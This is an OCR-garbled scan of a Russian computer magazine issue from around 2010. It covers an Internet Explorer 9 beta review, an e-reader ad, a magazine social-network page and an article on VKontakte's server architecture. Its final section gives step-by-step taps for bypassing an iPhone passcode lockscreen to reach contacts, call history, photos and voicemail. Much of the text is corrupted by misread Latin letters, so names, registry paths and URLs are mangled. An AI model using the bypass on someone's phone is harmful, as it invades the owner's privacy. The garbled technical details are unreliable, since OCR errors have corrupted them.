доосі геайі 

3@ксоп4$ ад« 






Ѵ.У 

Новый Іпіегпеі Ехріогег 



ЬоЬик Сгідогу ВаКипоѵ 

Врос мп машину, ищу вход в метро. 

Гшлгс ІіІОЗСОЧѴ, МоЗСО'іѴ 

7 ггошііез адэ 



ѴоигТѵѵееІБ заз 



РоІІоѵѵіпд 7Э РоІ)о\ѵегв 216 

& Х0Ж 

Раѵогііее Ю5 Ызіей іэ 

^ гпгиеГ Кесоттепгіегі АпісР Йеселііу Іізіеіі іп: ]ита1&. 

У п-гі е г-в! агкітд апгі иаіпд акірПіпІеге 5^ п д реоріе Киззіа-А 
(ІсатМЫодзр ипЬ. геэс) 

ТгепсІБ 

УУізгШѵѵІЕІе сЬапде 

тгЫ а с кГггсІау Рготоі&сі ЗЗОкіззезІогкеѵіп 



Интерфейс 

Первое, на что обращаешь внимание при открытии нового ІЕ — это, 
конечно же, обновленный интерфейс. Главный девиз разработчиков: 
«Основное внимание должно быть приковано к сайту, а не к браузе- 
ру». Наконец-то, проектировщикам интерфейса удалось избавиться 
от кипы совершенно бесполезных элементов и сконцентрироваться 
на том, что действительно важно во время веб-серфинга. К приме- 
ру, адресная строка и поле поиска теперь соединены в одно общее 
поле. Поисковую систему можно выбрать прямо в нижней части рас- 
крывающегося списка, там же добавляются дополнительные поис- 
ковые службы. Правда, при попытке открыть страницу со списком 
поисковых сервисов сервер МісгозоІІ в первый раз отфутболил 
меня фразой «Эегѵег із Іоо Ьизу» :). При открытии новой вкладки 
браузер отображает список наиболее посещаемых сайтов, к которым 
можно быстро получить доступ. Для каждого сайта отображается его 
Іаѵісоп, а также специальный индикатор, цвет которого соответству- 
ет цвету иконки, который отражает частоту посещения ресурса. По 
умолчанию предлагается 10 ярлыков, но их количество можно уве- 
личить, воспользовавшись небольшим хаком. Для этого надо под- 
править параметр ІЧитРоѵѵз в ветке реестра НКЕѴ_СІ)ВВЕІ\ІТ_ІІ5ЕР\ 
ЭоІІѵѵагеѴМісгозоІіѴіпІегпеІ Ехр[огег\ТаЬЬебВгоѵѵ5Іпд\ЫеѵѵТаЬРаде. 
Вообще, новая система вкладок заслуживает всяческой похвалы: 
она стала действительно удобной. Например, связанные вкладки 
обозначаются одним цветом, что в таких запущенных случаях, как у 
меня (а это всегда 20-30 открытых вкладок одновременно], позволя- 
ет не сойти с ума и лучше ориентироваться в местами раздражаю- 
щем хаосе. Когда открываешь новую страницу из другой вкладки, 
новая вкладка размещается рядом с первой, и их цвета совпадают. 
Радуют даже маленькие нюансы. Например, когда закрываешь 
вкладку, которая является частью группы, на ее месте отображается 
другая вкладка из той же группы: нет никакого неожиданного пере- 
хода на несвязанную страницу. К тому же, всю группу вкладок можно 
закрыть в два клика мыши через контекстное меню. В Рігеіюх'е для 
реализации подобной системы вкладок постоянно приходилось 
устанавливать дополнительный плагин. 

Если для выполнения определенной задачи нужно просматривать 
несколько веб-страниц одновременно, для вкладок можно полно- 
ценно использовать функцию Эпар, появившуюся в ѴѴіпбоѵѵз. 

Т.е. можно не только открепить одну из вкладок, поместив ее в 
отдельное окно браузера (в этом бы не было ничего нового], но и 
«приклеить» ее к краю экрана. Окно в этом случае автоматически 
рессайзится до размеров половины экрана. Просто перетащи каж- 



дую из вкладок на противоположные края экрана, и сайты будут 
наглядно отображаться рядом. Еще одна фишка ѴѴіпбоѵѵз 7, которая 
используется в новом ІЕ — это списки переходов. Если кликнуть 
правой кнопки мыши на Іпіегпеі Ехріогег в панели задач, появится 
список наиболее посещаемых сайтов. К тому же, на панель задач, 
перетащив вкладку мышью прямо из браузера, можно прикрепить 
произвольный сайт (например, ОМаіІ] и быстро открывать его прямо 
из таскбара. 

Быстродействие 

Как и обещали разработчики еще в Тесбпісаі Веѵіеѵѵ, Іпіегпеі 
Ехріогег будет очень быстрым браузером. В этом направлении 
сделано несколько правильных шагов. Во-первых, в браузере 
используется аппаратное ускорение графики, видео и текста. Это 
означает, что веб-сайты будут работать так же, как установленные 
в системе программы. Если взять страницы со сложной графикой, 
несложно заметить, насколько шустрее они стали выполняться в 
ІЕ9 Веіа. Это стало доступным за счет 0ігесі20 и прямого исполь- 
зования 6Р1). Достаточно посмотреть демку с движениями планет 
солнечной системы, чтобы захотеть во время разработки проектов 
больше работать в направлении ОРІЭ (ускорение рендеринга за 
счет использования процессора видеокарты]. Интереса ради реко- 
мендую запустить этот же тест в других браузерах. Во-вторых, это, 
конечно же, новый ЭаѵаЗсгірІ-движок, который называется Сбакга. 
Разработчики из Редмонда полностью переписали обработчик 
^ѵаЭсгірІ. Он использует сильно оптимизированный доступ к объ- 
ектной модели. В отличие от других браузеров (включая ІЕ8], в ІЕ9 
движок Э5 интегрирован прямо в браузер и имеет общую с ним 
ЭОМ, что позволяет сильно сэкономить на синхронизации и пере- 
сылке объектов (т.н. тагзбаііпд]. Помимо этого используется фоно- 
вая компиляция в машинный код, что дает ощутимый результат. Как 
нам рассказывал Алекс Могилевский, один из архитекторов Іпіегпеі 
Ехріогег, разработка Э5-движка — это очень нетривиальная задача. 
Например, один из важных вопросов при выполнении ЭаѵаЗсгі рі — 
то, когда и какую часть скрипта компилировать. Компилированный 
скрипт работает быстрее, но компиляция занимает время. Фоновая 
компиляция и ряд других улучшений, в том числе оптимизация 
для использования нескольких ядер, серьезно улучшили произ- 
водительность нового Сбакга, что хорошо видно на популярном 
ЭаѵаЗсгі рі бенчмарке ѴѴеЬКіІ'з ЭипЭрібег. Вышедшая 17 ноября 
новая версия движка Іпіегпеі Ехріогег 9, так называемое РІаІІогт 
Ргеѵіеѵѵ 7, отлично справляется с этим тестом, обходя другие брау- 
зеры. Еще одно классное нововведение напрямую касается времени 
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Рекламно-информационный проект 






РС 20ЫЕ 





С помощью системы ярлыков можно быстро открыть 
часто посещаемые ресурсы 

запуска и скорости работы браузера. Я говорю о советнике по про- 
изводительности надстроек. По сути, это встроенный бенчмарк, 
который определяет, сколько времени уходит на запуск каждого 
из аддонов. Таким образом, легко можно определить и сразу же 
отключить те надстройки, которые замедляют работу браузера. 
Производительность некоторых из них меня, мягко говоря, удивила. 
Кстати, сведения оформляются в удобной панели уведомлений, еще 
одном нововведении III нового «эксплорера». 

Безопасность 

Несколько новых фишек «девятки» напрямую касаются безопас- 
ности серфинга. В браузере теперь улучшен фильтр межсайтовых 
сценариев (Х55), который может обнаруживать некоторые типы 
атак такого рода. При обнаружении уязвимых мест браузер Іпіегпеі 
Ехріогег сам отключает вредоносные сценарии. Выделенное имя 
домена в адресной строке явно указывает на то, что разработчики 
хотят максимально оградить пользователя от фишинговых сайтов. 

В браузер встроен защитный фильтр — в Місгозоіі его называ- 
ют ЭтагіЭсгееп. Он предотвращает фишинговые атаки, а также 
загрузку вредоносных файлов. При обнаружении вредоносного 
сайта браузер полностью блокирует его в случае необходимости. Но 
можно также включить «выборочное блокирование» — тогда блоки- 
руются лишь вредоносные страницы и не затрагиваются остальные 
части веб-сайта. Фильтр ЭтагіЭсгееп также интегрирован в обнов- 
ленный диспетчер загрузки (о чудо, наконец-то, в ІЕ появилась 
нормальная качалка файлов внутри ІЕ) для обеспечения защиты 
от скачивания малвари. Подобно многим антивирусным продук- 
там, в Іпіегпеі Ехріогег вводится понятие «репутация». Фильтр 
удаляет все ненужные сообщения для знакомых файлов и отобра- 
жает серьезные предупреждения для загрузок с высоким уровнем 
опасности. Правда, просмотр репутации в бета-версии отключен. 
Традиционный приватный режим (в ІЕ он называется ІпРгіѵаІе) 
позволяет просмотреть страницу, не оставляя в системе кукисов, а в 
истории — факта посещения ресурса. Если во время использования 
браузера произойдет разрыв соединения, сеанс просмотра не будет 
потерян. Если одна или несколько вкладок неожиданно крэшнутся, 
они будут автоматически загружены повторно с теми же сайтами, 
которые были до закрытия. К тому же, каждая вкладка изолирована: 
если с одной что-то случится, это никак не коснется всех остальных. 

Поддержка стандартов 

Широкая поддержка НТМЕ5, ЭѴО, СЭЭ 3, ЕСМАЭсгірІб и 00М предо- 
ставляет кодерам возможность разрабатывать приложения, мало 
чем отличающиеся от обычных программ (подробнее о том, что 
дают эти стандарты, ты можешь прочитать в материале «НТМБ5: Да 
придет спаситель» в ноябрьском номере ][). Неотъемлемой частью 
воплощения единой разметки в жизнь является поддержка в ІЕ9 функ- 
ций, необходимых для обеспечения единообразной с другими браузе- 
рами работы НТМБ, ЗаѵаЗсгірІ и СЭЭ. Разработчики Іпіегпеі Ехріогег, 
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В «девятке» серьезно улучшены инструменты разра- 
ботчика 

активно участвующие в процессе формирования и утверждения стан- 
дартов, скрупулезно реализуют их в своем браузере. В этом опять 
же нас заверил Алекс Могилевский, который представляет Місгозоіі 
в консорциуме ѴѴЗС. Если пройти в текущей версии ІЕ9 популярный 
текст АсібЗ, получится рейтинг 95/1 00. В оставшихся 5 пунктах таится 
поддержка ЭѴС-шрифтов и ЭМІБ-анимация ЭѴ6, работа над которы- 
ми еще ведется. Справедливости ради замечу, что ни шрифты, ни 
анимация не находят поддержки среди веб-разработчиков, поэтому 
они могут попросту выйти из стандартов. Два самых ожидаемых 
компонента НТМЕ5, которые теперь поддерживаются в бета-версии 
«эсплорера» — это новые элементы <ѵібео> и <аибіо>. Их под- 
держка позволяет использовать на странице нативные, аппаратно- 
ускоренные элементы для воспроизведения видео и аудио контента 
без необходимости в дополнительных плагинах (вроде ЭіІѵегІідЫ’а 
или ЕІазЬ'а). Вставить на страницу видеоролик теперь так же просто, 
как и картинку. По словам Андрея Яблонских, директора по разви- 
тию «РБК Софт», поддержка современных стандартов в ІЕ9 позволи- 
ла предложить клиентам более эффективные решения по разработке 
веб-приложений, которые раньше были просто невозможны. Это 
в том числе заслуга компонента <сапѵаз>, который используется 
в сочетании с АРІ Сапѵаз 20. Согласно спецификации НТМБ5, он 
позволяет отображать графику на зависимом от разрешения рас- 
тровом полотне. Вся нагрузка по отображению графики (в том числе 
элементов <сапѵаз> и текста) в ІЕ9 перенесена с ЦП на графическую 
плату с помощью технологий 0ігесі20 и БігесіѴѴгіІе. 

Для разработчика 

В новой версии серьезно прокачены встроенные утилиты для деве- 
лоперов и всех тех, у кого возникает необходимость проанализиро- 
вать страницу. Помимо ряда нововведений, чувствуется серьезная 
оптимизация скорости работы БеѵТооІз. Средство разработчика 
(быстро вызывается хоткеем Е12) — это комплексный инструмент, 
с помощью которого выполняется ряд полезных действий. Здесь 
можно экспериментировать с НТМЕ/С55-кодом, воспользоваться 
отладчиком и профилировщиком 5аѵаЭсгірІ, изменить ІІзег-АдепІ 
в хедерах НТТР-запроса, поиграться с разными разрешениями. 
Особого внимания заслуживает вкладка для мониторинга сетевой 
активности. Это, конечно, не полноценный Еіббіег ( ѵѵѵѵѵѵ.ІібсІІег2.сопп/ 
ІісИІег ]. но очень близко к нему. Нажимаешь кнопку «Начать сбор» 
и видишь весь сетевой график, со временным тестами, с графиками 
— все это можно посмотреть и проанализировать. В одной из более 
ранних версий, еще на английском языке, на вкладке ЭаѵаЗсгі рі; была 
доступна замечательная опция «Еогтаі ЭаѵаЗсгі рі», которая преоб- 
разовывала совершенно нечитаемый упакованный код на ЭаѵаЗсгі рі: 
обратно в удобный для изучения вид. Функция работала очень здоро- 
во. В последней русскоязычной бета-версии, которая у меня сейчас 
установлена, этой возможности почему-то нет. Но я уверен, что в 
релизе она уж точно станет доступна. В таких мелочах — весь новый 
Іпіегпеі Ехріогег. И это действительно и совершенно точно очень 
радует! ц-ц 
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Настраиваемое меню 

Месяц без подзарядки 

Сенсорный экран (сІідШгег) 6" или 9,7" 

Высокая детализация 1200x825 пике 

Более 40 словарей АВВУУ Ыпдѵо 

ТехМо-зреесИ на 24 языках 

МРЗ плеер 

ѴѴі-Рі, ВІиеІооіИ, ЗС 

Читает 16 форматов книг 
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ВКОНТАКТЕ: 

КАК УСТРОЕНА 
СОЦИАЛЬНАЯ СЕТЬ 

Архитектура одного из самых нагруженных 
сервисов рунета 

о Без малого 100 миллионов пользователей - такова аудитория 
ВКонтакте, которую надо обслуживать. Быстро и без перебоев. Долгое 
время подробности технической реализации ВКонтакте оставались 
секретом. Но недавно самая популярная в России социальная сеть 
пролила немного света на то, как она все-таки устроена. 



В конце октября в Москве состоялась конференция НідЫ_оасІ++, 
на которой представители ВКонтакте в лице Павла Дурова и Олега 
Илларионова, наконец, рассказали кое-что об архитектуре социаль- 



ной сети. Парней буквально завалили вопросами по совершенно 
различным аспектам работы ВКонтакте, в том числе и техническим. 
Еще бы. Легко представить нагрузку на серверную часть сервиса: 
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Посмотреть всех 
возможных друзей * 
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Моя Страница рад. 


Журнал ХАКЕР; официальная группа 


Мои Друзья (62) 
Мои Фотографій 
Мои Видеозаписи 

рз) 

Мои Аудиозаписи 
Мои Сообщения 






Информация 

О группе 
Название: 

Туш; 

Категория: 

Описание: 


Журнал ХАКЕР: официальная группа 

Клуб 

Компьютер и интернет 


Мои Заметив 
Мои Группы (30) 
Мои Встречи 


Хакер ^крутейший в России и Европе 
компьютерный журнал, посвящённьчі вопросам 
компьютерных трюков, информационной 
безопасности, программирования и 
администрирования компьютерных сетей. 


Мои Новости 
Мои Закладки 
Мои Настройки: 

Мнения 

Приложения (57) 


Дурмап издается с 1999 года, ежемесячный тираж 
составляет более 100 000 экз. Комплектуется 
двухслойный ОТО объемом 8,5 Гб, 

Контактная информация 

Веб-сайт: Ннр://ѵуѵт.хаікер.т 

Город: Москва, Россия 


Конкурс 






Алексей Дегтя рён 


3 Свежие новости ред. 



Декабрьский номер уже в продаже! 

Новый номер ты можешь найти в продаже, а полистать его можно 
пряно в браузере на странице с анонтм : 

■ НТРЦ 5 — взгляд через призму безопасности 

* Исследуем внутренности Тгоіап-СІіекег,ѴЙп32ЛѴІтвЙег по-взрослому 

* ѴігсиэІВох; неочевидные трюки использования виртуальной машины 

* Компьютерная криминалистика: как собьют улики и расследуют 
инциденты 

* Бурим ядро ѴіПпсКдоб: теорий и практика Кептй РооЗ Оѵегбои 

* Ручная реаннмашія дампа памяти 

* Как вьігодно продать свой эксплойт через сервис 201 

4 Падение железного занавеса: управляем оборудованием из ііпих 

* Начинаем кодить под Мае 03 с помошью ОЬіесйѵе-С 
4 Правдійая история о том, как ловят "драпов" 

* Обзор нестандартных файеров и инструментов защиты веб-сереисов 
4 Теория н практика перехвата вызовов .ИБГ-функццй 

+ МедаЫеѵиз, Еавунаск, ТірѴУТпсІе, Рао Іітйй, ѴШМ2 

Конкурс для всех 

Журнал Хакер представляет конкурс по поиску багов в бета-версии 
ЮМ ІоШз ЗушрЗірпу 3. Покажи себя в деле — и выиграй поездку в США 
на конференцию ЮТизрЬеге с 17 по 21 января 20 И года! 

Все, что нужно для участия в конкурсе — установить І_оіи5 БутрЬрпу 
Бе Іа 3 , найти любые ошибки/недостатки и отправить их на сайт 




ДНИЮИ™ Щ 




Редактировать информацию 
Редактировать руководство 
Редактировать Состав 
Пригласитъ в группу 
Статистика группы 
Покинуть группу 
Добавить в закладки 

Друзья в группе 
Показано 14 друзей. 




Сергей Алексей Алексей 

Альбомы (6) 

Видео (13 видеозаписей) 

Руководство 

4 руководителя Вс і 



Официальная группа нашего журнала ВКонтакте 



как много людей ты знаешь, которые не пользуются этой социальной 
сетью? А сколько времени ты там проводишь, тратя бесценные часы 
своей жизни на общение с друзьями, просмотр видео, игры, музыку? 
Математика довольно проста: баснословное количество пользовате- 
лей • масса проведенного времени на ресурсе = запредельное коли- 
чество запросов к веб-серверам и базе данных + терабайты посто- 
янно загружаемых и просматриваемых фотографий, видео и аудио. 
Взаимодействие участников социальной сети происходит практиче- 
ски в режиме реального времени: все друзья должны немедленно 
узнавать о том, что произошло с каждым из участников. Сайт должен 
быть доступен 100% времени. Как это удается? 

Платформа 

Для нас, конечно, особый интерес представляет именно архитектура 
проекта: как взаимодействуют основные компоненты системы, какие 
собственные разработки потребовались, какими трюками пришлось 
воспользоваться. Но прежде, чем перейти к ней, необходимо озна- 
комиться с базовыми вещами — используемыми технологиями и 
продуктами. 

В качестве основной операционной системы используется ОеЬіап 
І_іпих — решение, проверенное временем, один из самых старых и 
стабильных современных дистрибутивов. Для балансировки нагруз- 
ки между серверами приложений используется НТТР-сервер пдіпх, 
работающий в режиме геѵегзе ргоху. В его обязанности входит дер- 
жать соединение с браузером пользователя и передавать запросы 
серверам, ответственным за исполнение РНР-кода, а также контро- 
лировать попадание результата обратно в браузер. РНР-код испол- 



няется посредством модуля тоб_рбр для Арасбе — альтернативных 
вариантов довольно много, особенно на основе протокола РазЮВІ, 
но руководство ВКонтакте пошло по более консервативному пути 
в этом вопросе, воспользовавшись самым проверенным временем 
решением. Никаких особых систем оптимизации производитель- 
ности РНР-кода не используется (например, в РасеЬоок написали 
свой компилятор из РНР в С под названием НірНор], единственной 
внешней оптимизацией является кэширование оп-кода посредством 
всем доступного решения ХСасбе. 

Ситуация с хранением данных выглядит достаточно размыто: с 
одной стороны, активно используется собственная система управле- 
ния базами данных, написанная на С и созданная «лучшими умами» 
России, с другой — часто упоминалась Му50І_ в роли основного хра- 
нилища. Подробнее про собственную базу данных ВКонтакте я рас- 
скажу ниже. Говоря о хранении данных, нельзя не упомянуть о таком 
важном аспекте, как кэширование часто используемой информации 
(расположение её в оперативной памяти для быстрого доступа). 

Для этого используется очень популярный продукт в этой области 
— тетсасЬесІ. Если ты не слышал: эта система позволяет осущест- 
влять очень простые атомарные операции, такие как расположение 
и получение произвольных данных по ключу. Основной фишкой 
является молниеносно быстрый доступ и возможность легкого 
объединения оперативной памяти большого количества серверов в 
общий массив для временного хранения "горячих" данных. 
Сторонние проекты, не являющиеся ключевыми для ВКонтакте, 
часто реализуются либо с использованием довольно экзотических 
решений, либо, наоборот, на самых простых технологиях. Например, 
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• 99,5 миллионов учетных записей. 

• 40 миллионов активных пользователей во всем мире (сопоста- 
вимо с аудиторией интернета в России). 

• 1 1 миллиардов запросов в день. 

• 200 миллионов личных сообщений в день. 

• Видеопоток достигает 160Гбит/с. 

• Более 10 тысяч серверов, из которых только 32 — фронтенды 
на пдіпх (количество серверов с Арасбе неизвестно). 

• 30-40 разработчиков, 2 дизайнера, 5 системных администрато- 
ров, много людей в датацентрах. 

• Каждый день выходит из строя около 10 жестких дисков. 

сервис мгновенного обмена сообщениями реализован на побе. 

)з (подробнее об этой разработке ты можешь прочитать в статье 
«Серверный б а ѵа 5 с г і р 1; » в ][ 08/2010) с использованием протоко- 
ла ХМРР ака баЬЬег (мы еще к нему вернемся). Конвертирование 
видео реализовано на самой простой и эффективной библиотеке — 
Ібтред, на ней же работает очень популярный видео-плеер ѴІ_С. 

Архитектура 

Самым заметным отличием от архитектуры многих других круп- 
ных интернет-проектов является тот факт, что сервера ВКонтакте 
многофункциональны. Т.е. нет четкого разделения на серверы баз 
данных, файловые серверы и т.д. — они одновременно исполь- 
зуются в нескольких ролях. При этом перераспределение ролей 
происходит в полуавтоматическом режиме с участием системных 
администраторов. С одной стороны, это оптимизирует эффектив- 
ность использования системных ресурсов, что хорошо, но с другой 
— повышает вероятность конфликтов на уровне операционной 
системы в рамках одного сервера, что влечет за собой проблемы 
стабильности. Впрочем, несмотря на использование серверов в 
разных ролях, вычислительные мощности проекта обычно исполь- 
зуются менее чем на 20%. 

Балансировка нагрузки между серверами происходит по многоу- 
ровневой схеме, которая включает в себя балансировку на уровне 
БЫЗ (домен обслуживается с помощью 32 ІР-адресов), а также 
маршрутизацию запросов внутри системы, причем разные сервера 
используются для разных типов запросов. Например, генерация 
страниц с новостями (теперь это принято называть микроблогом) 
работает по хитрой схеме, использующей возможности протокола 
тетсасбеб по параллельной отправке запросов на получение дан- 
ных по большому количеству ключей. В случае отсутствия данных в 
кэше, аналогичный запрос отправляется системе хранения данных, 
а полученные результаты подвергаются сортировке, фильтрации и 
отбрасыванию лишнего уже на уровне РНР-кода. Похожим образом 
этот функционал работает и в РасеЬоок (они недавно обменивались 
опытом), только вместо собственной СУБД в РасеЬоок используют 
Му5СН_. 

В стенах ВКонтакте было разработано большое количество софта, 
который более точно удовлетворяет потребностям проекта, чем 
доступные орепзоигсе и коммерческие решения. Помимо упо- 
минавшейся собственной СУБД у них есть система мониторинга с 
уведомлением по СМС (Павел сам помогал верстать интерфейс), 
автоматическая система тестирования кода и анализаторы стати- 
стики и логов. 

В проекте используется достаточно мощное оборудование, ориен- 
тировочно были названы следующие характеристики серверов: 

- 8-ядерные процессоры Іпбеі (по два на сервер, 
видимо) ; 

- 64 Гб оперативной памяти; 

- 8 жестких дисков; 

- КАЮ не используется (репликация и резервное 
копирование осуществляется на программном уровне) . 






Интересные факты 
о ВКонтакте 



• Процесс разработки близок к методологии Адііе с недельными 
итерациями (циклами), в рамках которых проходят все этапы 
разработки: планирование, анализ требований, проектирование, 
разработка и тестирование. 

• Ядро операционной системы модифицировано (на предмет 
работы с памятью), есть своя пакетная база для ОеЬіап. 

• Фотографии загружаются на два жестких диска одного сервера 
одновременно, после чего создается резервная копия на другом 
сервере. 

• Есть много доработок над тетсасЬесІ, в.т.ч. для более ста- 
бильного и длительного размещения объектов в памяти; есть 
даже версия, обеспечивающая сохранность данных. 

• Фотографии не удаляются для минимизации фрагментации. 

• Решения о развитии проекта принимают Павел Дуров и 
Андрей Рогозов, ответственность за сервисы — на них и на реа- 
лизовавшем его разработчике. 

• Павел Дуров откладывал деньги на хостинг с 1 курса :). 




Примечательно, что сервера не брендированные, а собираются 
специализированной российской компанией. Сейчас оборудо- 
вание проекта расположено в 4 датацентрах в Санкт-Петербурге 
и Москве, причем вся основная база данных располагается в 
питерском датацентре, а в Москове хостится только аудио и видео. 
В планах сделать репликацию базы данных с другим датацентром 
в Ленинградской области, а также использовать СопЩЩ Беііѵегу 
ЫеП/ѵогк для повышения скорости скачивания медийного контента 
в регионах. 

Многие проекты, сталкивающиеся с большим количеством фото- 
графий, часто изобретают собственные решения по их хранению 
и отдаче пользователям. Об этом был первый вопрос, заданный 
Павлу из зала: «Как вы храните изображения?» — «На дисках!». 
Так или иначе, представители ВКонтакте заявили, что вся эта куча 
фотографий всех цветов и размеров просто хранится и отдается с 
файловой системы (используют хбз) большого количества серве- 
ров, без дополнительных изысков. Смущает разве что тот факт, что 
у других крупных проектов такой подход не сработал — наверное, 
они не знали волшебного слова :). 

Не менее волшебной представляется та самая собственная база 
данных на С. Этому продукту, пожалуй, было уделено основное 
внимание аудитории, но при этом почти никаких подробностей 
о том, что он, собственно говоря, собой представляет, так и не 
было обнародовано. Известно, что СУБД разработана «лучшими 
умами» России, победителями олимпиад и конкурсов ТорСобег, а 
также что она используется в самых высоконагруженных сервисах 
В Конта кте: 



- Личные сообщения 

- Сообщения на стенах 

- Статусы 

- Поиск 

- Приватность 

- Списки друзей 

В отличие от МуБОБ используется нереляционная модель данных, 
а большинство операций осуществляется в оперативной памяти. 
Интерфейс доступа представляет собой расширенный протокол 
тетсасбеб. Специальным образом составленные ключи возвра- 
щают результаты сложных запросов (чаще всего специфичных для 
конкретного сервиса). 

Система проектировалась с учетом возможности кластеризации и 
автоматической репликации данных. Разработчики хотели бы сде- 
лать из данной системы универсальную СУБД и опубликовать под 
СРІ_, но пока не получается из-за высокой степени интеграции с 
остальными сервисами. 
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• БеЫап І_іпих [ ѵѵѵѵѵѵ.сІеЬіап.огс ) — основная опера- 
ционная система 

• пдіпх ( зѵзоеѵ.ги/пдіпх ) — балансировка нагрузки 

• РНР ( ѵѵѵѵѵѵ.рЬр.пеІ: ) + ХСасЬе (хсасбе.іідбирсі.пеі:) 

• АрасЬе ( \ллллл/.арасЬе.ог ) + тоб_рЬр 

• тетсасЬесІ ( тетсасбесі.огд ) 

• Му5(ЭІ_ [ ѵѵѵѵѵѵ.ту5д[.согт ) 

• Собственная СУБД на С, созданная «лучшими 
умами» России 

• посіедз ( пос!е]з.огд ) — прослойка для реализации 
протокола ХМРР, живет за НАРгоху ( Ьаргохѵ.іѵѵі.еи ) 

• х^з ( х^з.огд ) — файловая система для хранения 
изображений и отдачи пользователю 

• ^тред і ^тред.огд ] — конвертирование видео 

Подпроекты 

Сервисы аудио и видео являются побочными для соци- 
альной сети, на них создатели проекта особо не фоку- 
сируются. В основном это связано с тем, что они редко 
коррелируют с основной целью использования социаль- 
ной сети — общением, а также создают большое количе- 
ство проблем. Видеотрафик — основная статья расходов 
проекта, плюс всем известные проблемы с нелегальным 
контентом и претензиями правообладателей. 1000—1500 
серверов используются для перекодирования видео, на 
них же оно и хранится. Медиа-файлы банятся по хэшу при 
удалении по просьбе правообладателей, но это неэффек- 
тивно и планируется усовершенствовать этот механизм. 
Очевидно, речь идет о разработке более интеллектуаль- 
ного алгоритма распознавания аудио- и видео-контента 
по тегам, как это, к примеру, реализовано в ѴоиТиЬе, где 
загруженный видеоролик, нарушающий лицензию, может 
быть автоматически удален уже через несколько минут 
после загрузки. 

Как известно, некоторое время назад появилась возмож- 
ность общаться на ВКонтакте через протокол 5аЬЬег (он 
же ХМРР). Протокол совершенно открытый и существует 
масса орепзоигсе реализаций. По ряду причин (среди 
которых проблемы интеграции с остальными сервисами 
ВКонтакте) было решено за месяц создать собственный 
сервер, представляющий собой прослойку между внутрен- 
ними сервисами ВКонтакте и реализацией ХМРР протоко- 
ла. Реализован он на победе — выбор обусловлен тем, что 
баѵаВсгірІ: знают практически все разработчики проекта, 
к тому же это хороший набор инструментов для реализа- 
ции задачи. Сложным моментом стала работа с большими 
контакт- л и ста ми. У многих пользователей количество 
друзей ВКонтакте измеряется сотнями и тысячами, высока 
активность смены статусов: люди появляются и исчезают 
из онлайна чаще, чем в других аналогичных ситуациях. К 
тому же необходимо было реализовать тесную интеграцию 
с внутренней системой обмена личными сообщениями 
ВКонтакте. В результате на сервисе 60-80 тысяч человек 
онлайн, в пике — 150 тысяч. ТСР/НТТР-балансировщик 
нагрузки НАРгоху обрабатывает входящие соединения и 
используется для распределения запросов по серверам, а 
также развертывания новых версий. 

При выборе системы хранения данных думали о нере- 
ляционных системах хранения данных (в частности, о 
МопдоРВ), но в итоге решили воспользоваться привычной 
Му5С11_. Сервис функционирует на 5-ти серверах разной 
конфигурации, на каждом из которых работает код на побе. 
)з (по 4 процесса на сервер), а на трех самых мощных — 
еще и Му5С11_. Интересной особенностью является отсут- 




Павел Дуров 



ствие связи между группами друзей в ХМРР с группами 
друзей на сайте — сделано по просьбе пользователей, 
которые не хотели, чтобы их друзья из-за плеча видели, 
в какой группе они находятся. 

Важным подпроектом является также интеграция с 
внешними ресурсами, которую в условиях высокона- 
груженного сервиса реализовать далеко не так просто. 
Все чаще на страницах сторонних проектов можно уви- 
деть виджеты «Мне нравится», позволяющими быстро 
поделиться интересным постом со своими друзьями, а 
также небольшие блоки «Мы ВКонтакте» с данными о 
пользователях внутри привязанной группы. Основные 
шаги, предпринятые в этом направлении, с небольшими 
комментариями: 

• Максимальная кроссбраузерность для виджетов и 
ІРгате-приложений на основе библиотек еазуХйМ 

и ^азЮТМ, обеспечивающих взаимодействие между 
сторонним ресурсом и программным интерфейсом 
ВКонтакте. Таким образом была решена проблема крос- 
сдоменного взаимодействия и вопрос работы во всех 
браузерах. 

• Кросс-постинг статусов в ТѵѵіКег, реализованный с 
помощью очередей запросов. 

• Кнопка «поделиться с друзьями», поддерживающая 
орепОгарб-теги и автоматически подбирающая подходя- 
щую иллюстрацию (путем сравнивания содержимого тега 
<бие> и атрибутов аІТ у изображений. 

• Возможность загрузки видео через сторонние видео- 
хостинги (ѴоиТиЬе, ВиТиЬе, Ѵітео, и т.д.). 

Не секрет 

Завеса тайны насчет технической реализации ВКонтакте 
была немного развеяна, опубликовано куча интересных 
аспектов, но все же многие моменты по-прежнему оста- 
ются секретом. Возможно, в будущем появится более 
детальная информация о собственной СУБД ВКонтакте, 
которая, как оказалось, является ключом к решению всех 
самых сложных моментов в масштабируемости системы. 
Сейчас, как бы кто ни относился к ВКонтакте, сервис 
является очень интересным сточки зрения построения 
высоконагруженных систем. Все-таки 11 миллиардов 
запросов в день, высочайший аптайм и почти 100 мил- 
лионов пользователей — дорогого стоят, □с 




> ѵѵагпіпд 

Далеко не все круп- 
ные проекты публично 
раскрывают аспекты 
построения архитек- 
туры. Даже примерная 
информация отом, что 
у них происходит и как 
они работают, часто 
держится в секрете. 
Источником инфор- 
мации чаще всего 
оказываются либо 
выступления предста- 
вителей проектов на 
конференциях, либо 
различные интервью/ 
публикации сотрудни- 
ков. Информация для 
этого материала была 
собрана автором из 
этих же источников 
и не является офи- 
циально подтверж- 
денной со стороны 
В Конта кте. 
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ЗАДАЧА: ОБХОД ЛОКСКРИНА 
НАІРНОЫЕ 



РЕШЕНИЕ: 

Поговорим немного о мобильной безопасности. А точнее, о знамени- 
том яблочном продукте, который и в нашей стране достаточно сильно 
распространен — глазофон :). Мобильники уже давно неотъемлемая 
часть нашей жизни, а сучетом развития технологий (всевозможных 
встроенных камер, разнообразного софта, возможности работать в 
Сети], объемы конфиденциальной информации, хранимой на портатив- 
ныхустройствах, сильно возрастают. И никто не хочет, чтобы она попала 
кому-то постороннему в руки. Атем болеетак просто, какэто можно 
сделатьсайфоном. 

Яблочники допустили оплошность, наверное, в самом важном — в 
локскрине. И, что хуже, для обхода локскрина нетребуется ни специаль- 
ныхзнаний ни специального софта. Любой можетвсегоза пару кликов 
залезть в запароленноеустройство. Говоря «за пару» — я не сильно 
приукрасил ситуацию, смотри сам. 



1) Разблочим девайс 

2 ) Кликаем : 

Ешегдепсу Саіі 

3 ) Набираем 3 решетки: 

# # # 

4) Нажимаем Саіі и почти сразу Роѵ/ег 
Все! боскзсгееп ВураззесІ! 

Правда, после этого мы попадаем только в контакт-лист, а не в стандар- 
тный интерфейс. Но и оттуда мы можем увидеть список контактов (что 
логично], список звон ков, просмотреть фотографии и голосовую почту. 
Можно звонить кому хочешь! Ходят слухи о доступе к видео, органайзеру 
